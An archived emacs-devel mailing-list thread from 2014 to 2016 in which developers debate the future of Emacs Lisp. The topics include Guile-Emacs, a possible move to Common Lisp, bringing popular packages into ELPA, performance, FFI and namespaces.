* Re: Emacs Lisp's future 2014-09-26 16:50 ` Jonas Bernoulli 2014-09-26 18:23 ` Christopher Allan Webber @ 2014-09-26 20:37 ` Stefan Monnier 1 sibling, 0 replies; 404+ messages in thread From: Stefan Monnier @ 2014-09-26 20:37 UTC (permalink / raw) To: Jonas Bernoulli; +Cc: Rasmus, emacs-devel > I have read the remarks about packages not having to be done before > being added to Elpa. But currently not even a releasable version of > Magit exists. The right way to think about the `elpa' branch in Emacs is "github for Elisp" rather than "retirement home for mature packages". So indeed code doesn't need to be "ready for release". Magit has been in use for many years now, so it's definitely ready for some kind of release, whether you call it a "pretest release" or a "only for daredevils" doesn't really matter, because many people seem quite happy using it. > Instead of adding Magit as is, I would rather add certain components of > Magit to Emacs itself (after sufficiently abstracting them) and move > certain functionality into libraries that are already part of Emacs. That can be done as well. But there's no reason that one should preclude the other. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 14:15 ` Rasmus 2014-09-18 14:34 ` Phillip Lord @ 2014-09-18 23:17 ` Richard Stallman 2014-09-18 23:37 ` Rasmus 2014-09-19 2:03 ` Stefan Monnier 1 sibling, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-09-18 23:17 UTC (permalink / raw) To: Rasmus; +Cc: emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] For popular packages to be distributed outside of Emacs and ELPA has some bad consequences: * We can't change them when we change some part of Emacs that they use. That makes it hard for us to change interfaces. * We don't have copyright assignments in them, so we can't move the code into Emacs. * They may say things that work against the GNU Project in other ways, such as by recommending nonfree programs, or by recommending rivals of GNU packages. I think therefore that we do more to move the popular packages into ELPA or Emacs. Meanwhile, code in Emacs or ELPA should not use external packages. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 23:17 ` Richard Stallman @ 2014-09-18 23:37 ` Rasmus 2014-09-19 2:03 ` Stefan Monnier 1 sibling, 0 replies; 404+ messages in thread From: Rasmus @ 2014-09-18 23:37 UTC (permalink / raw) To: emacs-devel Richard Stallman <rms@gnu.org> writes: > [[[ To any NSA and FBI agents reading my email: please consider ]]] > [[[ whether defending the US Constitution against all enemies, ]]] > [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > For popular packages to be distributed outside of Emacs and ELPA > has some bad consequences: > > * We can't change them when we change some part of Emacs that they use. > That makes it hard for us to change interfaces. > > * We don't have copyright assignments in them, so we can't move the code > into Emacs. > > * They may say things that work against the GNU Project in other ways, > such as by recommending nonfree programs, or by recommending rivals of > GNU packages. > > I think therefore that we do more to move the popular packages into > ELPA or Emacs. Great! But this may be easier said than done. * Take Magit. According to github it has 124 contributors. Even if the main contributors would agree to move it to ELPA, it may not be easy to establish contact to everyone. Cider has 82, projectile 79 etc. The real number of assignments is probably less than the sum, though. * For auto-complete there's already Company in ELPA (of course there can be two packages doing the same thing). * ESS is already tied to the R project. Something like integrating the two big ido modes (smex and ido-ubiquitous) into ido and integrating desired functions from dash and s may be nice short-run targets (but people with more intimidate knowledge of Emacs core programming will no doubt have greater insights on this). –Rasmus -- Lasciate ogni speranza o voi che entrate: siete nella mani di'machellaio ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-18 23:17 ` Richard Stallman 2014-09-18 23:37 ` Rasmus @ 2014-09-19 2:03 ` Stefan Monnier 1 sibling, 0 replies; 404+ messages in thread From: Stefan Monnier @ 2014-09-19 2:03 UTC (permalink / raw) To: Richard Stallman; +Cc: Rasmus, emacs-devel > I think therefore that we do more to move the popular packages into > ELPA or Emacs. I've been the main driving force behind the addition of packages to GNU ELPA so far. I hope other people can give me a hand. Most of the work for that requires very little technical knowledge. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 11:17 ` Phillip Lord ` (2 preceding siblings ...) 2014-09-17 20:21 ` Richard Stallman @ 2014-09-17 22:49 ` Daniel Colascione 3 siblings, 0 replies; 404+ messages in thread From: Daniel Colascione @ 2014-09-17 22:49 UTC (permalink / raw) To: Phillip Lord, Stefan Monnier; +Cc: emacs-devel [-- Attachment #1: Type: text/plain, Size: 1582 bytes --] On 09/17/2014 04:17 AM, Phillip Lord wrote: > Stefan Monnier <monnier@iro.umontreal.ca> writes: >> First, of course we can keep on evolving Elisp on its own. This has >> worked OK for the last 30 years, so it's not such a terrible choice. >> The main problems I see with that: >> - Elisp is slow and as CPUs aren't getting faster, its slowness makes itself >> noticed more often. > > I've been going through some 10 year old elisp of mine recently. The > thing that surprises me is how many times I mention performance in it. I > rarely worry about this these days. Elisp performance as is seems rarely > an issue. > > Where I would say that there is an issue is that too much of Emacs is > written in C. Having a faster elisp would allow moving more into lisp > and thus having more of Emacs extensible dynamically. > >> - Lack of some features, most notably FFI and concurrency. >> - Lack of manpower. > > I'd add a fourth. People who want to extend Emacs for their own purposes > have to learn it. Having JS extensibility would be an enourmous win. ...until the next fad comes along, at which point JS becomes a liability. Popular environments come and go. JS is hip now; Lua, Python, Ruby, and lots of other languages see interest rise and fall according to fashion, taste, and the Hacker News ranking algorithm. Who knows which languages will be popular in a few years? Emacs Lisp has been here and has kept almost complete source compatibility for decades and has been completely immune to these fads. Let's maintain this tradition. [-- Attachment #2: OpenPGP digital signature --] [-- Type: application/pgp-signature, Size: 819 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier ` (4 preceding siblings ...) 2014-09-17 11:17 ` Phillip Lord @ 2014-09-17 12:46 ` Eric Brown 2014-09-17 13:33 ` Taylan Ulrich Bayirli/Kammer 2014-09-17 20:23 ` Richard Stallman 2014-09-17 21:13 ` Lars Magne Ingebrigtsen ` (2 subsequent siblings) 8 siblings, 2 replies; 404+ messages in thread From: Eric Brown @ 2014-09-17 12:46 UTC (permalink / raw) To: Stefan Monnier; +Cc: Christopher Allan Webber, emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: > One such option is Guile-Emacs. This presumably would give us a faster > implementation (at least in theory, their bytecode is significantly > more efficient), would give us an FFI, and would give us more manpower > since we'd be benefiting from the work done on Guile. My vote is for whatever brings emacs closer to an FFI that allows us to e.g. generate emacs buffer content in whichever language(s) bests suits the developer and the domain of the subject. > > And of course, if Guile's own manpower dries up, Emacs would be forced > to keep supporting Guile, which is more work than supporting just Elisp. > I thought that Guile is the annointed extension language of GNU projects. Perhaps if more GNU projects evolved into supporting Guile, it would bring more critical mass and interest to bear on Guile. I understand the reality that Emacs is developed largely by volunteer effort. Speaking as a donor/FSF Associate Member, I believe that this should be considered a strategic goal of FSF/GNU leadership. A cynical reply to my comments would be "show me the code, contributions welcome." But without FSF/GNU's coordination and $upport, I fail to see how Emacs will ever evolve beyond the efforts of Hemlock, Guilemacs, Deuce, Climacs, and countless other well-intentioned projects that have failed to take root due to scale of the effort required to make a port of equivalent high functionality, quality, and portability. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 12:46 ` Eric Brown @ 2014-09-17 13:33 ` Taylan Ulrich Bayirli/Kammer 2014-09-17 13:52 ` Eli Zaretskii 2014-09-17 20:23 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: Taylan Ulrich Bayirli/Kammer @ 2014-09-17 13:33 UTC (permalink / raw) To: Eric Brown; +Cc: Christopher Allan Webber, Stefan Monnier, emacs-devel Eric Brown <brown@fastmail.fm> writes: > [...] I fail to see how Emacs will ever evolve beyond the efforts of > Hemlock, Guilemacs, Deuce, Climacs, and countless other > well-intentioned projects [...] Note that Guile-Emacs runs existing Elisp as-is and is basically a drop-in replacement. It's still the GNU Emacs you know; it's not even like XEmacs. It only *adds* things to GNU Emacs. (But currently it's in what one could call a alpha or even pre-alpha stage.) More information: http://www.emacswiki.org/emacs/GuileEmacs Taylan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 13:33 ` Taylan Ulrich Bayirli/Kammer @ 2014-09-17 13:52 ` Eli Zaretskii 2014-09-17 15:11 ` Taylan Ulrich Bayirli/Kammer 0 siblings, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-09-17 13:52 UTC (permalink / raw) To: Taylan Ulrich Bayirli/Kammer; +Cc: cwebber, emacs-devel, brown, monnier > From: Taylan Ulrich Bayirli/Kammer <taylanbayirli@gmail.com> > Date: Wed, 17 Sep 2014 15:33:04 +0200 > Cc: Christopher Allan Webber <cwebber@dustycloud.org>, > Stefan Monnier <monnier@iro.umontreal.ca>, emacs-devel@gnu.org > > Note that Guile-Emacs runs existing Elisp as-is and is basically a > drop-in replacement. But that's not really true, is it? Just look at the changes made in the Guile-Emacs repo to core Lisp files, and you will see what I mean. Btw, I admit I don't completely understand what the wiki says about the problems with t and nil, but if that means you cannot say in Guile-Emacs something like (if (eq foo t) ... then there are more than 700 places in Emacs that will stop working. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 13:52 ` Eli Zaretskii @ 2014-09-17 15:11 ` Taylan Ulrich Bayirli/Kammer 0 siblings, 0 replies; 404+ messages in thread From: Taylan Ulrich Bayirli/Kammer @ 2014-09-17 15:11 UTC (permalink / raw) To: Eli Zaretskii; +Cc: cwebber, emacs-devel, brown, monnier Eli Zaretskii <eliz@gnu.org> writes: >> From: Taylan Ulrich Bayirli/Kammer <taylanbayirli@gmail.com> >> Date: Wed, 17 Sep 2014 15:33:04 +0200 >> Cc: Christopher Allan Webber <cwebber@dustycloud.org>, >> Stefan Monnier <monnier@iro.umontreal.ca>, emacs-devel@gnu.org >> >> Note that Guile-Emacs runs existing Elisp as-is and is basically a >> drop-in replacement. > > But that's not really true, is it? Just look at the changes made in > the Guile-Emacs repo to core Lisp files, and you will see what I mean. It's not a 100% drop-in replacement, that's true. I'll take a peek what changes in Elisp files it did; the only one I remember at the moment is Gnus directly writing out Elisp bytecode somewhere. > Btw, I admit I don't completely understand what the wiki says about > the problems with t and nil, but if that means you cannot say in > Guile-Emacs something like > > (if (eq foo t) ... > > then there are more than 700 places in Emacs that will stop working. (eq foo t) should always work. (eq foo nil) will only work if that `nil' came from Elisp code; if it's a Scheme #f or '() in disguise, then you need to make that (not foo) or (null foo) (both works in both cases); anything but (eq foo nil). Taylan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 12:46 ` Eric Brown 2014-09-17 13:33 ` Taylan Ulrich Bayirli/Kammer @ 2014-09-17 20:23 ` Richard Stallman 1 sibling, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-09-17 20:23 UTC (permalink / raw) To: Eric Brown; +Cc: cwebber, monnier, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] I thought that Guile is the annointed extension language of GNU projects. Yes, it is. Guile is the direction we should go, if at all possible. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier ` (5 preceding siblings ...) 2014-09-17 12:46 ` Eric Brown @ 2014-09-17 21:13 ` Lars Magne Ingebrigtsen 2014-09-20 19:31 ` Robin Templeton 2016-10-07 10:47 ` Lars Brinkhoff 8 siblings, 0 replies; 404+ messages in thread From: Lars Magne Ingebrigtsen @ 2014-09-17 21:13 UTC (permalink / raw) To: emacs-devel As Lamba The Ultimate notes in http://lambda-the-ultimate.org/node/5048, this has been picked up by Hacker News. I haven't read any of the comments there myself, so it may or may not be of interest: https://news.ycombinator.com/item?id=8328206 -- (domestic pets only, the antidote for overdose, milk.) bloggy blog: http://lars.ingebrigtsen.no ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier ` (6 preceding siblings ...) 2014-09-17 21:13 ` Lars Magne Ingebrigtsen @ 2014-09-20 19:31 ` Robin Templeton 2016-10-07 10:47 ` Lars Brinkhoff 8 siblings, 0 replies; 404+ messages in thread From: Robin Templeton @ 2014-09-20 19:31 UTC (permalink / raw) To: emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: > The only standard language into which Elisp can evolve, AFAICT, is > Common Lisp. [ Now some readers get disappointed, while some others > become excited. ] There are some incompatibilities between the two > languages, but I can imagine working them out over the years, or even > living with them without too much trouble, such that we could use > Common-Lisp libraries in Emacs. > > Of course, that's for the language side, but on the implementation side, > I don't really know what Common-Lisp implementation we could re-use > (both GNU implementations are dormant, so there's no manpower for us > tap into). Still: there are many Common-Lisp implementations out there, > so there's probably one that could work for us. There is: Guile-Emacs combined with an improved and extended `cl' library, plus language extensions needed for Common Lisp compatibility, many of which have native support in the Guile VM. I've also considered the possibility of porting Emacs to a Common Lisp implementation; it does come up in Lisp circles once in a while. I think that route would entail difficulties that don't apply to Guile-Emacs, for a few different reasons. First and most obviously, Guile is also a GNU project, and therefore shares certain technical and political priorities with Emacs, which isn't necessarily a given elsewhere. Consider the Common Lisp implementations that could work for Emacs: those that are free software and are actively developed with large user communities. SBCL is one such Lisp. It's a first-rate Lisp implementation with an excellent compiler, wide adoption in the free software Lisp community and lots of compatible libraries. But it's not a good fit for Emacs's needs. First, it's a compiler-only implementation with a large and complex runtime system including garbage collectors, native-code compilers, assemblers, etc. that exists largely independently of the host *nix environment. And as a result, it's monstrously difficult to port to new platforms. It's also not at all designed to be an extension language, and the current version of the manual says: "Calling Lisp functions from C is sometimes possible, but is extremely hackish and poorly supported as of SBCL 0.7.5." AFAICT, similar considerations apply to Clozure CL, the only other good candidate I know of, although it does at least support callbacks from C. Beyond that, it's true that Common Lisp is more closely related to Elisp than Scheme is, and Common Lisp and Elisp have a greater degree of overlap in their semantics and standard libraries. Even so, I believe that the Guile platform is a superior choice as a foundation for Emacs and Emacs Lisp. Common Lisp was the first standardized object-oriented language and was shaped by decades of experience with traditional Lisp systems, and it would be beneficial for Elisp to become more compatible with Common Lisp. Nonetheless, Common Lisp tends to agglutinate logically distinct features into components which are rather monolithic. That's not a bad thing in most contexts, but makes things trickier for Emacs and Elisp. Scheme, on the other hand, is famously designed according to the principle that "Programming languages should be designed not by piling feature on top of feature, but by removing the weaknesses and restrictions that make additional features appear necessary," and this has shaped the design of Guile, due to the primacy of Scheme in the Guile implementation and community. A concrete example: Common Lisp and Elisp both include almost identical facilities for special variables. Guile Scheme doesn't; what it has are fluids, a library for thread-local dynamic bindings independent of the core Scheme language, which have a rather different interface. So that looks like a win for Common Lisp and a point against Guile when it comes to dynamic binding. However, once you take into consideration the details of the apparently slight gap between the languages, the overlap in design begins working against you. Elisp provides various kinds of context-sensitive variables, notably buffer-local variables, and thousands of packages rely on the availability of this facility. But Common Lisp doesn't give you the tools to implement it. What Common Lisp gives you is something that has a strong resemblance to the corresponding part of Elisp, but which isn't actually the same thing. And because it's a fundamental part of the language, compilers that have been tuned for 20-30 years to support a single standardized language optimize for a specific special variable semantics. So, if you want to support buffer-local variables, you have two basic choices: (1) You can modify Common Lisp: first figure out exactly how special variables are implemented in SBCL's compiler and runtime, how to extend them to support Elisp semantics without breaking any legal Lisp programs, and how to permit optimization of the use of standard special variables without breaking the behavior of code using BLVs. (2) Or you can DIY: implement your own special-variable library that supports BLVs. Because Common Lisp defines a fixed high-level interface for special variables, you won't get much help from the host language. In this case, the apparent similarity between Elisp and Common Lisp doesn't actually lead to shared functionality, and interaction between the two languages will be less natural than it could be. With Guile, the situation is different. When ad hoc extensions to core functionality are necessary, the situation no worse than with Common Lisp, and often better because Guile is typically more modular. But ad hoc extensions often aren't necessary at all, because Guile takes a fundamentally different approach to language design. In the case of buffer-local variables, Guile provides delimited continuations, which are powerful enough to implement both dynamic binding and BLVs as libraries, without changing the semantics of Scheme and therefore without disrupting the operation of other programs. Using delimited continuations and a fluids library, one can implement context-local bindings in under a hundred lines of code. A proof-of-concept was presented at GHM 2011; a version compatible with Elisp BLVs would probably expand to several hundred lines. Another example: Common Lisp defines a standard package system that may need extensions or modifications to work well with Elisp, while Guile provides a module system designed for Scheme but also exposes enough of the internal functionality to build other namespace systems. Guile-Elisp makes use of this to compile a Lisp-2 dialect without any special support from Guile, and it could be used as the basis for an Elisp-specific module system. And this pattern repeats over and over in the implementation of Elisp in the context of a standard Common Lisp system. The small differences turn out to matter; the family reunion becomes a feud. It's definitely possible to port Emacs to a Common Lisp implementation; with enough work and enough time, it could be done and done well. But it won't necessarily be simple or straightforward, and it's unlikely to be easier than porting Emacs to the Guile platform, a project which has progressed from running standalone games of "dunnet.el" to supporting the complete Emacs system with less than a person-year of work. Scheme's turn towards minimalism may seem to be something of only academic appeal, but it affords a freedom of expression that turns out to be extremely practical. Guile gives you access to the fundamental abstractions needed to express entire classes of high-level features, and this makes it uniquely qualified to serve as a platform for multiple Lisp dialects. Robin -- Inteligenta persono lernas la lingvon Esperanton rapide kaj facile. Esperanto estas moderna, kultura lingvo por la mondo. Simpla, fleksebla, belsona, Esperanto estas la praktika solvo de la problemo de universala interkompreno. Lernu la interlingvon Esperanton! ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier ` (7 preceding siblings ...) 2014-09-20 19:31 ` Robin Templeton @ 2016-10-07 10:47 ` Lars Brinkhoff 2016-10-07 11:03 ` Nikolay Kudryavtsev ` (3 more replies) 8 siblings, 4 replies; 404+ messages in thread From: Lars Brinkhoff @ 2016-10-07 10:47 UTC (permalink / raw) To: emacs-devel Now that we have new maintainers, I'd be curious to hear if they have any thoughs on this? (See the original post for more information.) Stefan Monnier wrote two years ago: > I've had the opportunity to think a bit more about Emacs Lisp and its > possible evolution and I'm still not sure what to think about it. > [...] > I think that ideally, we'd want to stick to Elisp, or some evolution > thereof. Sadly, I don't see how to evolve Elisp into Scheme: they are > closely related languages, but the differences are large enough that > it seems hard to reconcile them. > > The only standard language into which Elisp can evolve, AFAICT, is > Common Lisp. [ Now some readers get disappointed, while some others > become excited. ] There are some incompatibilities between the two > languages, but I can imagine working them out over the years, or even > living with them without too much trouble, such that we could use > Common-Lisp libraries in Emacs. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-07 10:47 ` Lars Brinkhoff @ 2016-10-07 11:03 ` Nikolay Kudryavtsev 2016-10-07 11:27 ` Philippe Vaucher 2016-10-08 8:23 ` Helmut Eller 2016-10-07 15:32 ` Kelvin White ` (2 subsequent siblings) 3 siblings, 2 replies; 404+ messages in thread From: Nikolay Kudryavtsev @ 2016-10-07 11:03 UTC (permalink / raw) To: Lars Brinkhoff, emacs-devel Is there even a reason to try evolving Elisp into something else? Instead, you can cherry-pick the features you want. With cl-lib you get almost CL. With dash.el you get your "new cool lisp". And so on. -- Best Regards, Nikolay Kudryavtsev ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-07 11:03 ` Nikolay Kudryavtsev @ 2016-10-07 11:27 ` Philippe Vaucher 2016-10-07 11:48 ` Nikolay Kudryavtsev 2016-10-07 12:52 ` Stefan Monnier 2016-10-08 8:23 ` Helmut Eller 1 sibling, 2 replies; 404+ messages in thread From: Philippe Vaucher @ 2016-10-07 11:27 UTC (permalink / raw) To: Nikolay Kudryavtsev; +Cc: Lars Brinkhoff, Emacs developers [-- Attachment #1: Type: text/plain, Size: 397 bytes --] > Is there even a reason to try evolving Elisp into something else? Instead, > you can cherry-pick the features you want. With cl-lib you get almost CL. > With dash.el you get your "new cool lisp". And so on. The big benefit I see is being able to replace the lisp engine with a more standard one, and thus benefit from performance enhancements / bugfixes / etc from the other engine. Philippe [-- Attachment #2: Type: text/html, Size: 651 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-07 11:27 ` Philippe Vaucher @ 2016-10-07 11:48 ` Nikolay Kudryavtsev 2016-10-08 14:00 ` Ben 2016-10-07 12:52 ` Stefan Monnier 1 sibling, 1 reply; 404+ messages in thread From: Nikolay Kudryavtsev @ 2016-10-07 11:48 UTC (permalink / raw) To: Philippe Vaucher; +Cc: Lars Brinkhoff, Emacs developers And that project already exists as Guile Emacs. But here we jump into a different territory - the current runtime is relatively well tested, polished and stable among all platforms. While Guile is not and I'm not sure if there is a free software lisp runtime that is. So, apart from being a lot of work just to migrate, for which there is no manpower, we would also introduce a whole slew of new bugs. -- Best Regards, Nikolay Kudryavtsev ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-07 11:48 ` Nikolay Kudryavtsev @ 2016-10-08 14:00 ` Ben 2016-10-08 15:39 ` Stefan Monnier 0 siblings, 1 reply; 404+ messages in thread From: Ben @ 2016-10-08 14:00 UTC (permalink / raw) To: Nikolay Kudryavtsev; +Cc: Lars Brinkhoff, Philippe Vaucher, Emacs developers [-- Attachment #1: Type: text/plain, Size: 700 bytes --] Why is it that nobody mentions Racket when talking about lisp or scheme? IMHO it's quite an practical and elegant dialect of lisp/scheme. On Fri, Oct 7, 2016 at 7:48 PM, Nikolay Kudryavtsev < nikolay.kudryavtsev@gmail.com> wrote: > And that project already exists as Guile Emacs. But here we jump into a > different territory - the current runtime is relatively well tested, > polished and stable among all platforms. While Guile is not and I'm not > sure if there is a free software lisp runtime that is. So, apart from being > a lot of work just to migrate, for which there is no manpower, we would > also introduce a whole slew of new bugs. > > > -- > Best Regards, > Nikolay Kudryavtsev > > > [-- Attachment #2: Type: text/html, Size: 1073 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-08 14:00 ` Ben @ 2016-10-08 15:39 ` Stefan Monnier 0 siblings, 0 replies; 404+ messages in thread From: Stefan Monnier @ 2016-10-08 15:39 UTC (permalink / raw) To: emacs-devel > Why is it that nobody mentions Racket when talking about lisp or scheme? I guess because we still need to run existing Elisp. The assumption being that Guile can run existing Elisp, and that it wouldn't be too hard to make an existing Common-Lisp system run existing Elisp as well. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-07 11:27 ` Philippe Vaucher 2016-10-07 11:48 ` Nikolay Kudryavtsev @ 2016-10-07 12:52 ` Stefan Monnier 1 sibling, 0 replies; 404+ messages in thread From: Stefan Monnier @ 2016-10-07 12:52 UTC (permalink / raw) To: emacs-devel > The big benefit I see is being able to replace the lisp engine with a more > standard one, and thus benefit from performance enhancements / bugfixes / > etc from the other engine. That's right. Any change would be motivated by the desire to benefit from other people's efforts w.r.t implementation of the language and of its libraries. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-07 11:03 ` Nikolay Kudryavtsev 2016-10-07 11:27 ` Philippe Vaucher @ 2016-10-08 8:23 ` Helmut Eller 2016-10-08 12:07 ` Clément Pit--Claudel 2016-10-08 20:57 ` Richard Stallman 1 sibling, 2 replies; 404+ messages in thread From: Helmut Eller @ 2016-10-08 8:23 UTC (permalink / raw) To: emacs-devel On Fri, Oct 07 2016, Nikolay Kudryavtsev wrote: > Is there even a reason to try evolving Elisp into something else? A major pain point of Emacs Lisp is the lack of module system or other namespace mechanism. The prefixes all over the place make Elisp code quite verbose and ugly. Evolving Elisp into a language with a module system would be a "good thing". Helmut ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-08 8:23 ` Helmut Eller @ 2016-10-08 12:07 ` Clément Pit--Claudel 2016-10-08 14:26 ` Nicolas Petton 2016-10-08 20:57 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: Clément Pit--Claudel @ 2016-10-08 12:07 UTC (permalink / raw) To: emacs-devel [-- Attachment #1.1: Type: text/plain, Size: 488 bytes --] On 2016-10-08 04:23, Helmut Eller wrote: > On Fri, Oct 07 2016, Nikolay Kudryavtsev wrote: > >> Is there even a reason to try evolving Elisp into something else? > > A major pain point of Emacs Lisp is the lack of module system or other > namespace mechanism. The prefixes all over the place make Elisp code > quite verbose and ugly. Evolving Elisp into a language with a module > system would be a "good thing". The nameless package has made this much better for me :) [-- Attachment #2: OpenPGP digital signature --] [-- Type: application/pgp-signature, Size: 819 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-08 12:07 ` Clément Pit--Claudel @ 2016-10-08 14:26 ` Nicolas Petton 0 siblings, 0 replies; 404+ messages in thread From: Nicolas Petton @ 2016-10-08 14:26 UTC (permalink / raw) To: Clément Pit--Claudel, emacs-devel [-- Attachment #1: Type: text/plain, Size: 259 bytes --] Clément Pit--Claudel <clement.pit@gmail.com> writes: > The nameless package has made this much better for me :) Indeed, this package is nice, but it's only a visual enhancement. Having namespaces in Elisp would still be great IMO. Cheers, Nico [-- Attachment #2: signature.asc --] [-- Type: application/pgp-signature, Size: 512 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-08 8:23 ` Helmut Eller 2016-10-08 12:07 ` Clément Pit--Claudel @ 2016-10-08 20:57 ` Richard Stallman 2016-10-08 21:40 ` Nicolas Petton ` (2 more replies) 1 sibling, 3 replies; 404+ messages in thread From: Richard Stallman @ 2016-10-08 20:57 UTC (permalink / raw) To: Helmut Eller; +Cc: emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] Namespace systems do not fit well into Lisp. Common Lisp's is a total mess. It is better to use name prefixes. -- Dr Richard Stallman President, Free Software Foundation (gnu.org, fsf.org) Internet Hall-of-Famer (internethalloffame.org) Skype: No way! See stallman.org/skype.html. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-08 20:57 ` Richard Stallman @ 2016-10-08 21:40 ` Nicolas Petton 2016-10-08 22:15 ` Helmut Eller 2016-10-10 4:09 ` Georges Ko 2 siblings, 0 replies; 404+ messages in thread From: Nicolas Petton @ 2016-10-08 21:40 UTC (permalink / raw) To: rms, Helmut Eller; +Cc: emacs-devel [-- Attachment #1: Type: text/plain, Size: 268 bytes --] Richard Stallman <rms@gnu.org> writes: Hi Richard, > Namespace systems do not fit well into Lisp. Common Lisp's is a total > mess. It is better to use name prefixes. Have you had a look at Clojure namespaces? http://clojure.org/reference/namespaces Cheers, Nico [-- Attachment #2: signature.asc --] [-- Type: application/pgp-signature, Size: 512 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-08 20:57 ` Richard Stallman 2016-10-08 21:40 ` Nicolas Petton @ 2016-10-08 22:15 ` Helmut Eller 2016-10-10 9:00 ` Richard Stallman 2016-10-10 4:09 ` Georges Ko 2 siblings, 1 reply; 404+ messages in thread From: Helmut Eller @ 2016-10-08 22:15 UTC (permalink / raw) To: emacs-devel On Sat, Oct 08 2016, Richard Stallman wrote: > Namespace systems do not fit well into Lisp. The designers and users of the most important Lisps obviously disagree with you: Common Lisp, Scheme (since R6RS) and Clojure all have either namespaces or modules. Racket even has both. Helmut ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-08 22:15 ` Helmut Eller @ 2016-10-10 9:00 ` Richard Stallman 2016-10-11 1:42 ` Richard Stallman 0 siblings, 1 reply; 404+ messages in thread From: Richard Stallman @ 2016-10-10 9:00 UTC (permalink / raw) To: Helmut Eller; +Cc: emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > Namespace systems do not fit well into Lisp. > The designers and users of the most important Lisps obviously disagree > with you: They are entitled to their opinions but I am not impressed by them. Common Lisp, Scheme (since R6RS) and Clojure all have either > namespaces or modules. Racket even has both. I implemented the Common Lisp name space facility on the Lisp machine, and I found it was inconvenient for actual use. It is better always to use the full name. -- Dr Richard Stallman President, Free Software Foundation (gnu.org, fsf.org) Internet Hall-of-Famer (internethalloffame.org) Skype: No way! See stallman.org/skype.html. ^ permalink raw reply [flat|nested] 404+ messages in thread
